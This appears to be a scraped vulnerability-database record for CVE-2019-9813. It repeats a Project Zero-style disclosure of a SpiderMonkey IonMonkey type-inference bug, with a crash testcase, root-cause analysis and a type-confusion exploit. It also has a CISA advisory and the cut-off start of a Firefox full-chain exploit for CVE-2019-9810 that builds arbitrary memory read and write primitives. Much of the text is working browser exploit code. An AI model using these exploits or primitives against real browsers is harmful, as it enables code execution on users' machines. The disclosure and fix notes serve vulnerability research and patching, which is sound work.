As such, the compiled code for hax will be invalidated [9]. Then, during the first invocation of hax with changeProto == true, a new prototype will be set for o, which will \n \n1. cause a new ObjectGroup to be allocated for o (because prototypes are stored in the object group) and \n2. cause the previous object group (OG2) to discard any inferred types and set the state of inferred properties to unknown [10]. An ObjectGroup with unknownProperties is then never again used for type inference of properties [11]. \n \nAt a later point in the loop, the function is recompiled, but this time it is compiled to expect an object of ObjectGroup OG1 or OG2 as input. The JIT compiled code for hax will now look something like this (pseudocode): \n \n// Verify that the input is an object with ObjectGroup OG1 or OG2 (actually \n// this check is performed before entering the JITed code) \nVerifyInputTypes \n \nif (changeProto) { \n// A SetProperty [12] inline cache [13] which will perform the actual \n// property store and speed up subsequent property stores on objects of \n// the same Shape and Group. Since a type barrier is required, the Group \n// is used as an additional index into the cache so that both Shape and \n// Group must match, in which case no inferred types could be \n// accidentally invalidated. \nSetPropertyICWithTypeBarrier o.p 42 \n \nCall ChangePrototype(o, {}) \n} \n \n// Another inline cache to store property .p again, but this time without a \n// type barrier. As such, only the Shape will be checked and not the Group. \nSetPropertyIC o.p 13.37 \n \nReturn o \n \nAfter compilation finishes, the following happens in the first invocation of the JITed code: \n \n* The function is called with an object of ObjectGroup OG2 and Shape S1 \n* The property .p is stored on the object in the first SetProperty cache. 
This does not update any inferred type as OG2 does not use inferred types \n* The prototype of o is changed \n* This again causes a new ObjectGroup, OG3, to be allocated \n* When creating the new group, property types are inferred from the current object (this is possible because it is the only object using the new group) [14] \n* As such, o now has an ObjectGroup OG3 with inferred types {.p: [int]} \n* The second property store cache runs into a cache miss (because it is empty at this point) \n* Execution transfers to the slow path (a runtime property store) \n* This will store the property and update the inferred types of OG3 to {.p: [int, float]} \n* It will then update the inline cache to now directly handle property stores to objects with shape S1 \n* Because this SetPropertyIC is not marked as requiring a type barrier, the cache only guards on the Shape, not the Group [15] \n \nThen, in the second invocation of the JITed code: \n \n* As above, a new ObjectGroup OG4 is allocated for o with inferred types {.p: [int]} when changing the prototype \n* The second SetPropertyIC now runs into a cache hit (because it only looks at the Shape which is still S1) \n* It then directly writes the property value into the property slot without updating inferred types \n \nAs such, after the second invocation the returned object is one whose ObjectGroup (OG4) states that the property .p must be an integer but it really is a float. At this time, any validation of inferred types will crash with an assertion as happens during the runtime property lookup of .p in the call to eval(). \n \nThe core issue here is that the second property store was marked as not requiring a type barrier. To understand why, it is necessary to look into the logic determining whether a property write should be guarded with a type barrier, implemented in jit::PropertyWriteNeedsTypeBarrier [16]. The logic of that function is roughly: \n \n1. 
Iterate over the set of possible object types, in this case that is OG1 and OG2 \n2. For every group, check whether storing a value of type T (in this case float) would violate inferred property types \n\\t- In this case, OG1 already has the correct type for property .p, so no violation there \n\\t- And OG2 does not even track property types, so again no violation [17] \n3. If no violations were found, no type barrier is needed \n \nThe problem is that PropertyWriteNeedsTypeBarrier operates on the possible ObjectGroups of the input object at the beginning of the function which are not necessarily the same as at the time the property store is performed. As such, it fails to realize that the input object can actually have an ObjectGroup (in this case OG4) that has inferred property types that would be violated by the property write. It then falsely determines that a type barrier is not needed, leading to the scenario described above. \n \n# Exploitation \n \nExploitation of this type of vulnerability comes down to JIT compiling a function in such a way that the compiler makes use of type inference data to omit runtime type checks. Afterwards a type confusion between arbitrary objects can be achieved. \n \nThe following code demonstrates this by setting the inferred type to Uint8Array but actually storing an object with controlled property values (overlapping with internal fields of a Uint8Array) in the property. It then compiles code (the function pwn) to omit type checks on the property value based on its inferred types, thus treating the custom object as a Uint8Array and crashing when reading from 0x414141414141: \n \nlet ab = new ArrayBuffer(1024); \n \nfunction hax(o, changeProto) { \n// The argument type for |o| will be object of group OG1 or OG2. OG1 will \n// have the inferred types {.p: [Y]}. OG2 on the other hand will be an \n// ObjectGroup with unknown property types due to the prototype change. As \n// such, OG2 will never have any inferred property types. 
\n \n// Ultimately, this code will confuse types X and Y with each other. \n// Type X: a Uint8Array \nlet x = new Uint8Array(1024); \n// Type Y: a unboxed object looking a bit like a Uint8Array but with controlled data... :) \nlet y = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310}; \n \nif (changeProto) { \no.p = x; \n \n// This prototype change will cause a new ObjectGroup, OG_N, to be \n// allocated for o every time it is executed (because the prototype is \n// stored in the ObjectGroup). During creation of the new ObjectGroup, \n// the current property values will be used to infer property types. As \n// such, OG_N will have the inferred types {.p: [X]}. \no.__proto__ = {}; \n} \n \n// This property write was not marked as requiring type barriers to \n// validate the consistency of inferred property types. The reason is that \n// for OG1, the property type is already correct and OG2 does not track \n// property types at all. However, IonMonkey failed to realize that the \n// ObjectGroup of o could have changed in between to a new ObjectGroup that \n// has different inferred property types. As such, the type barrier \n// omission here is unsafe. \n// \n// In the second invocation, the inline cache for this property store will \n// then be a hit (because the IC only uses the Shape to index the cache, \n// not the Group). As such, the inferred types associated with the \n// ObjectGroup for o will not be updated and will be left inconsistent. \no.p = y; \n \nreturn o; \n} \n \nfunction pwn(o, trigger) { \nif (trigger) { \n// Is on a code path that wasn't executed in the interpreter so that \n// IonMonkey solely relies on type inference instead of type profiles \n// from the interpreter (which would show the real type). \nreturn o.p[0]; \n} else { \nreturn 42; \n} \n} \n \n// \\\"Teach\\\" the function hax that it should accept objects with ObjectGroup OG1. 
\n// This is required as IonMonkey needs to have at least one \\\"known\\\" type when \n// determining whether it can omit type barriers for property writes: \n// https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6282 \nfor (let i = 0; i < 10000; i++) { \nhax({}, false); \n} \n \n// Compile hax to trigger the bug in such a way that an object will be created \n// whose ObjectGroup indicates type X for property .p but whose real type will \n// be Y, where both X and Y can be arbitrarily chosen. \nlet evilObj; \nfor (let i = 0; i < 10000; i++) { \nevilObj = hax({}, true); \n \n// Not sure why this is required here, it maybe prevents JITing of the main \n// script or similar... \neval('evilObj.p'); \n} \n \n// JIT compile the second function and make it rely on the (incorrect) type \n// inference data to omit runtime type checks. \nfor (let i = 0; i < 100000; i++) { \npwn(evilObj, false); \n} \n \n// Finally trigger a type confusion. \npwn(evilObj, true); \n \nNote, this way of exploiting the issue requires UnboxedObjects [18] which have recently been disabled by default [19]. However, the bug itself does not require UnboxedObjects and can be exploited in other ways. UnboxedObjects are just the most (?) convenient way. \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available (whichever is earlier), the bug \nreport will become visible to the public. 
\n \n[1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.h#L54 \n[2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L463 \n[3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87 \n[4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/Shape.h#L37 \n[5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L466 \n[6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L469 \n[7] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1448 \n[8] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.h#L10254 \n[9] https://blog.mozilla.org/javascript/2012/10/15/the-ins-and-outs-of-invalidation/ \n[10] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.cpp#L2219 \n[11] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/TypeInference.cpp#L2946 \n[12] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonIC.h#L280 \n[13] https://www.mgaudet.ca/technical/2018/6/5/an-inline-cache-isnt-just-a-cache \n[14] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1259 \n[15] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/CacheIR.cpp#L3544 \n[16] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6268 \n[17] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6293 \n[18] 
https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.h#L187 \n[19] https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca \n \n \n \nFound by: saelo@google.com \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/152304/GS20190330004947.txt"}], "cisa": [{"lastseen": "2020-12-18T18:07:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-9813"], "description": "Mozilla has released a security update to address vulnerabilities in Thunderbird. An attacker could exploit these vulnerabilities to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for [Thunderbird 60.6.1](<http://www.mozilla.org/en-US/security/advisories/mfsa2019-12/#CVE-2019-9813>) and apply the necessary update.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2019/03/25/Mozilla-Releases-Security-Update-Thunderbird>); we'd welcome your feedback.\n", "modified": "2019-03-25T00:00:00", "published": "2019-03-25T00:00:00", "id": "CISA:3568C9A99B63B8D5AC12A7DD1913C3BA", "href": "https://us-cert.cisa.gov/ncas/current-activity/2019/03/25/Mozilla-Releases-Security-Update-Thunderbird", "type": "cisa", "title": "Mozilla Releases Security Update for Thunderbird", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)", "edition": 1, "published": "2019-04-03T00:00:00", "title": "SpiderMonkey - IonMonkey Compiled Code Fails 
to Update Inferred Property Types (Type Confusion)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9813"], "modified": "2019-04-03T00:00:00", "id": "EXPLOITPACK:6998E6040B132C28C7A52F5F3C5E15E8", "href": "", "sourceData": "A bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that cause type confusions between arbitrary objects.\n\n# Prerequisites\n\nIn Spidermonkey, every JavaScript objects is an instance of the JSObject class [1]. Plain JavaScript objects (e.g. ones created through an object literal) are typically instances of the NativeObject [2] class. A NativeObject is basically:\n\n* An ObjectGroup [3] which stores things like the prototype and type information for properties (see below)\n* The Shape [4] of the object which indicates the location of properties. A Shape could e.g. tell that property .p is stored in the 2nd property slot\n* Property storage [5]: a dynamically sized array in which the property values are stored. The Shapes provide indices into this array\n* Element storage [6]: a dynamically sized array in which elements (properties with an integer key) are stored\n\nSpidermonky makes use of type inference to perform various optimizations in the JIT. Specifically, type inference is used to predict the types of object properties and then omit runtime type checks for them. Such a type inference system for property values is only safe as long as every property store to an object validates that the type of the new value is consistent with the existing type information or, if not, updates (\"widens\") the inferred type. In Spidermonkey's interpreter this is done in e.g. AddOrChangeProperty [7]. 
In the JIT compiler (IonMonkey), this is done through \"type barriers\" [8]: small runtime type checks that ensure the written value is consistent with what is stored as inferred type and otherwise bail out from the JITed code.\n\n# Crashing Testcase\n\nThe following program, found through fuzzing and then manually modified, crashes Spidermonkey with an assertion that verifies that type inference data is consistent with the actual values stored as properties:\n\n function hax(o, changeProto) {\n if (changeProto) {\n o.p = 42;\n o.__proto__ = {};\n }\n o.p = 13.37;\n return o;\n }\n\n for (let i = 0; i < 1000; i++) {\n hax({}, false);\n }\n\n for (let i = 0; i < 10000; i++) {\n let o = hax({}, true);\n eval('o.p'); \t\t\t// Crash here\n }\n\n\nCrashes in debug builds of Spidermonkey with:\n\n Assertion failure: [infer failure] Missing type in object [Object * 0x327f2ca0aca0] p: float, at js/src/vm/TypeInference.cpp:265\n Hit MOZ_CRASH() at js/src/vm/TypeInference.cpp:266\n\nThis assertion expresses that type inference data is inconsistent for the property .p as the type \"float\" is not in the list of possible types but the property currently holds a float value.\n\n# Bug Analysis\n\nIn essence it appears that IonMonkey fails to realize that the ObjectGroup of the object `o` can change throughout the function (specifically during the prototype change) and thus incorrectly omits a type barrier for the second property assignment, leading to inconsistent type inference information after the property assignment.\n\nIn detail, the following appears to be happening:\n\nThe first loop runs and allocates NativeObjects with ObjectGroup OG1 and Shape S1. After some iterations the function hax is JIT compiled. At that point, the compiled code will expect to be called with an object of ObjectGroup OG1 as input. 
OG1 will have inferred types {.p: [float]} because the body of the if condition was never executed and so property .p was never set to a non-float value.\n\nThen the second loop starts running, which will allocate objects using a new ObjectGroup, OG2 (I'm not exactly sure why it's a new one here, most likely some kind of heuristic) but still using Shape S1. As such, the compiled code for hax will be invalidated [9]. Then, during the first invocation of hax with changeProto == true, a new prototype will be set for o, which will\n\n1. cause a new ObjectGroup to be allocated for o (because prototypes are stored in the object group) and\n2. cause the previous object group (OG2) to discard any inferred types and set the state of inferred properties to unknown [10]. An ObjectGroup with unknownProperties is then never again used for type inference of properties [11].\n\nAt a later point in the loop, the function is recompiled, but this time it is compiled to expect an object of ObjectGroup OG1 or OG2 as input. The JIT compiled code for hax will now look something like this (pseudocode):\n\n // Verify that the input is an object with ObjectGroup OG1 or OG2 (actually\n // this check is performed before entering the JITed code)\n VerifyInputTypes\n\n if (changeProto) {\n // A SetProperty [12] inline cache [13] which will perform the actual\n // property store and speed up subsequent property stores on objects of\n // the same Shape and Group. Since a type barrier is required, the Group\n // is used as an additional index into the cache so that both Shape and\n // Group must match, in which case no inferred types could be\n // accidentally invalidated.\n SetPropertyICWithTypeBarrier o.p 42\n\n Call ChangePrototype(o, {})\n }\n\n // Another inline cache to store property .p again, but this time without a\n // type barrier. 
As such, only the Shape will be checked and not the Group.\n SetPropertyIC o.p 13.37\n\n Return o\n\nAfter compilation finishes, the following happens in the first invocation of the JITed code:\n\n* The function is called with an object of ObjectGroup OG2 and Shape S1\n* The property .p is stored on the object in the first SetProperty cache. This does not update any inferred type as OG2 does not use inferred types\n* The prototype of o is changed\n * This again causes a new ObjectGroup, OG3, to be allocated\n * When creating the new group, property types are inferred from the current object (this is possible because it is the only object using the new group) [14]\n * As such, o now has an ObjectGroup OG3 with inferred types {.p: [int]}\n* The second property store cache runs into a cache miss (because it is empty at this point)\n * Execution transfers to the slow path (a runtime property store)\n * This will store the property and update the inferred types of OG3 to {.p: [int, float]}\n * It will then update the inline cache to now directly handle property stores to objects with shape S1\n * Because this SetPropertyIC is not marked as requiring a type barrier, the cache only guards on the Shape, not the Group [15]\n\nThen, in the second invocation of the JITed code:\n\n* As above, a new ObjectGroup OG4 is allocated for o with inferred types {.p: [int]} when changing the prototype\n* The second SetPropertyIC now runs into a cache hit (because it only looks at the Shape which is still S1)\n* It then directly writes the property value into the property slot without updating inferred types\n\nAs such, after the second invocation the returned object is one whose ObjectGroup (OG4) states that the property .p must be an integer but it really is a float. 
At this time, any validation of inferred types will crash with an assertion as happens during the runtime property lookup of .p in the call to eval().\n\nThe core issue here is that the second property store was marked as not requiring a type barrier. To understand why, it is necessary to look into the logic determining whether a property write should be guarded with a type barrier, implemented in jit::PropertyWriteNeedsTypeBarrier [16]. The logic of that function is roughly:\n\n1. Iterate over the set of possible object types, in this case that is OG1 and OG2\n2. For every group, check whether storing a value of type T (in this case float) would violate inferred property types\n\t- In this case, OG1 already has the correct type for property .p, so no violation there\n\t- And OG2 does not even track property types, so again no violation [17]\n3. If no violations were found, no type barrier is needed\n\nThe problem is that PropertyWriteNeedsTypeBarrier operates on the possible ObjectGroups of the input object at the beginning of the function which are not necessarily the same as at the time the property store is performed. As such, it fails to realize that the input object can actually have an ObjectGroup (in this case OG4) that has inferred property types that would be violated by the property write. It then falsely determines that a type barrier is not needed, leading to the scenario described above.\n\n# Exploitation\n\nExploitation of this type of vulnerability comes down to JIT compiling a function in such a way that the compiler makes use of type inference data to omit runtime type checks. Afterwards a type confusion between arbitrary objects can be achieved.\n\nThe following code demonstrates this by setting the inferred type to Uint8Array but actually storing an object with controlled property values (overlapping with internal fields of a Uint8Array) in the property. 
It then compiles code (the function pwn) to omit type checks on the property value based on its inferred types, thus treating the custom object as a Uint8Array and crashing when reading from 0x414141414141:\n\n let ab = new ArrayBuffer(1024);\n\n function hax(o, changeProto) {\n // The argument type for |o| will be object of group OG1 or OG2. OG1 will\n // have the inferred types {.p: [Y]}. OG2 on the other hand will be an\n // ObjectGroup with unknown property types due to the prototype change. As\n // such, OG2 will never have any inferred property types.\n\n // Ultimately, this code will confuse types X and Y with each other.\n // Type X: a Uint8Array\n let x = new Uint8Array(1024);\n // Type Y: a unboxed object looking a bit like a Uint8Array but with controlled data... :)\n let y = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310};\n\n if (changeProto) {\n o.p = x;\n\n // This prototype change will cause a new ObjectGroup, OG_N, to be\n // allocated for o every time it is executed (because the prototype is\n // stored in the ObjectGroup). During creation of the new ObjectGroup,\n // the current property values will be used to infer property types. As\n // such, OG_N will have the inferred types {.p: [X]}.\n o.__proto__ = {};\n }\n\n // This property write was not marked as requiring type barriers to\n // validate the consistency of inferred property types. The reason is that\n // for OG1, the property type is already correct and OG2 does not track\n // property types at all. However, IonMonkey failed to realize that the\n // ObjectGroup of o could have changed in between to a new ObjectGroup that\n // has different inferred property types. As such, the type barrier\n // omission here is unsafe.\n //\n // In the second invocation, the inline cache for this property store will\n // then be a hit (because the IC only uses the Shape to index the cache,\n // not the Group). 
As such, the inferred types associated with the\n // ObjectGroup for o will not be updated and will be left inconsistent.\n o.p = y;\n\n return o;\n }\n\n function pwn(o, trigger) {\n if (trigger) {\n // Is on a code path that wasn't executed in the interpreter so that\n // IonMonkey solely relies on type inference instead of type profiles\n // from the interpreter (which would show the real type).\n return o.p[0];\n } else {\n return 42;\n }\n }\n\n // \"Teach\" the function hax that it should accept objects with ObjectGroup OG1.\n // This is required as IonMonkey needs to have at least one \"known\" type when\n // determining whether it can omit type barriers for property writes:\n // https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6282\n for (let i = 0; i < 10000; i++) {\n hax({}, false);\n }\n\n // Compile hax to trigger the bug in such a way that an object will be created\n // whose ObjectGroup indicates type X for property .p but whose real type will\n // be Y, where both X and Y can be arbitrarily chosen.\n let evilObj;\n for (let i = 0; i < 10000; i++) {\n evilObj = hax({}, true);\n\n // Not sure why this is required here, it maybe prevents JITing of the main\n // script or similar...\n eval('evilObj.p');\n }\n\n // JIT compile the second function and make it rely on the (incorrect) type\n // inference data to omit runtime type checks.\n for (let i = 0; i < 100000; i++) {\n pwn(evilObj, false);\n }\n\n // Finally trigger a type confusion.\n pwn(evilObj, true);\n\nNote, this way of exploiting the issue requires UnboxedObjects [18] which have recently been disabled by default [19]. However, the bug itself does not require UnboxedObjects and can be exploited in other ways. UnboxedObjects are just the most (?) 
convenient way.\n\n[1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.h#L54\n[2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L463\n[3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87\n[4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/Shape.h#L37\n[5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L466\n[6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L469\n[7] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1448\n[8] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.h#L10254\n[9] https://blog.mozilla.org/javascript/2012/10/15/the-ins-and-outs-of-invalidation/\n[10] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.cpp#L2219\n[11] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/TypeInference.cpp#L2946\n[12] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonIC.h#L280\n[13] https://www.mgaudet.ca/technical/2018/6/5/an-inline-cache-isnt-just-a-cache\n[14] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1259\n[15] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/CacheIR.cpp#L3544\n[16] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6268\n[17] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6293\n[18] 
https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.h#L187\n[19] https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca\n\n Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=1538120\n\n\n Fixed in https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813 (bug collision with a pwn2own entry)\n\nThe issue was fixed in two ways:\n\n1. in https://github.com/mozilla/gecko-dev/commit/0ff528029590e051baa60265b3af92a632a7e850 the code that adds inferred properties after a prototype change (step `* When creating the new group, property types are inferred from the current object` above) was changed to no longer create inferred property types when coming from Groups marked as having unknownProperties. As such, in this case the new ObjectGroups created from OG2 would now all have unknownProperties as well.\n\n2. in https://github.com/mozilla/gecko-dev/commit/f8ce40d176067800e5dda013fb4d8ff9e91d9a88 the function responsible for determining whether write barriers can be omitted (jit::PropertyWriteNeedsTypeBarrier) was modified to always emit write barriers if one of the input groups has unknownProperties.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:40:23", "description": "\nMozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack", "edition": 1, "published": "2019-12-07T00:00:00", "title": "Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810", "CVE-2019-11708"], "modified": "2019-12-07T00:00:00", "id": "EXPLOITPACK:63A0D5452D21EF0FAB97365E7C125A53", "href": "", "sourceData": "// Axel '0vercl0k' Souchet - November 19 2019\n\n// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip\n\n// 0:000> ? 
xul!sAutomationPrefIsSet - xul\n// Evaluate expression: 85724947 = 00000000`051c0f13\nconst XulsAutomationPrefIsSet = 0x051c0f13n;\n// 0:000> ? xul!disabledForTest - xul\n// Evaluate expression: 85400792 = 00000000`05171cd8\nconst XuldisabledForTest = 0x05171cd8n;\n\nconst Debug = false;\nconst dbg = p => {\n if(Debug == false) {\n return;\n }\n\n print(`Debug: ${p}`);\n};\n\nconst ArraySize = 0x5;\nconst WantedArraySize = 0x42424242;\n\nlet arr = null;\nlet Trigger = false;\nconst Spray = [];\n\nfunction f(Special, Idx, Value) {\n arr[Idx] = 0x41414141;\n Special.slice();\n arr[Idx] = Value;\n}\n\nclass SoSpecial extends Array {\n static get [Symbol.species]() {\n return function() {\n if(!Trigger) {\n return;\n }\n\n arr.length = 0;\n for(let i = 0; i < 0x40000; i++) {\n Spray.push(new Uint32Array(ArraySize));\n }\n };\n }\n};\n\nfunction GetMeBiggie() {\n for(let Idx = 0; Idx < 0x100000; Idx++) {\n Spray.push(new Uint32Array(ArraySize));\n }\n\n const SpecialSnowFlake = new SoSpecial();\n for(let Idx = 0; Idx < 10; Idx++) {\n arr = new Array(0x7e);\n Trigger = false;\n for(let Idx = 0; Idx < 0x400; Idx++) {\n f(SpecialSnowFlake, 0x70, Idx);\n }\n\n Trigger = true;\n f(SpecialSnowFlake, 47, WantedArraySize);\n if(arr.length != 0) {\n continue;\n }\n\n const Biggie = Spray.find(e => e.length != ArraySize);\n if(Biggie != null) {\n return Biggie;\n }\n }\n\n return null;\n}\n\nfunction ExploitCVE_2019_9810() {\n print = console.log;\n\n const Biggie = GetMeBiggie();\n if(Biggie == null || Biggie.length != WantedArraySize) {\n dbg('Failed to set things up :(.');\n return false;\n }\n\n //\n // Scan for one of the Uint32Array we sprayed earlier.\n //\n\n let Biggie2AdjacentSize = null;\n const JSValueArraySize = 0xfffa000000000000n | BigInt(ArraySize);\n for(let Idx = 0; Idx < 0x100; Idx++) {\n const Qword = BigInt(Biggie[Idx]) << 32n | BigInt(Biggie[Idx + 1]);\n if(Qword == JSValueArraySize) {\n Biggie2AdjacentSize = Idx + 1;\n break;\n }\n }\n\n 
if(Biggie2AdjacentSize == null) {\n dbg('Failed to find an adjacent array :(.');\n return false;\n }\n\n //\n // Use the array length as a marker.\n //\n\n const AdjacentArraySize = 0xbbccdd;\n Biggie[Biggie2AdjacentSize] = AdjacentArraySize;\n\n //\n // Find the array now..\n //\n\n const AdjacentArray = Spray.find(\n e => e.length == AdjacentArraySize\n );\n\n if(AdjacentArray == null) {\n dbg('Failed to find the corrupted adjacent array :(.');\n return false;\n }\n\n const ReadPtr = Addr => {\n const SizeInDwords = 2;\n const SavedSlot = [\n Biggie[Biggie2AdjacentSize],\n Biggie[Biggie2AdjacentSize + 2 + 2],\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\n ];\n\n //\n // Corrupt the `AdjacentArray`'s size / data slot.\n //\n\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\n\n //\n // Read arbitrary location now.\n //\n\n const Ptr = BigInt.fromUint32s([AdjacentArray[0], AdjacentArray[1]]);\n\n //\n // Restore the `AdjacentArray`'s size / data slot.\n //\n\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\n return Ptr;\n };\n\n const WritePtr = (Addr, Value) => {\n const SizeInDwords = 2;\n const SavedSlot = [\n Biggie[Biggie2AdjacentSize],\n Biggie[Biggie2AdjacentSize + 2 + 2],\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\n ];\n\n //\n // Corrupt the `AdjacentArray`'s size / data slot.\n //\n\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\n\n //\n // Write to arbitrary location now.\n //\n\n AdjacentArray[0] = Number(Value & 0xffffffffn);\n AdjacentArray[1] = Number(Value >> 32n);\n\n //\n // Restore the `AdjacentArray`'s size / data slot.\n //\n\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\n 
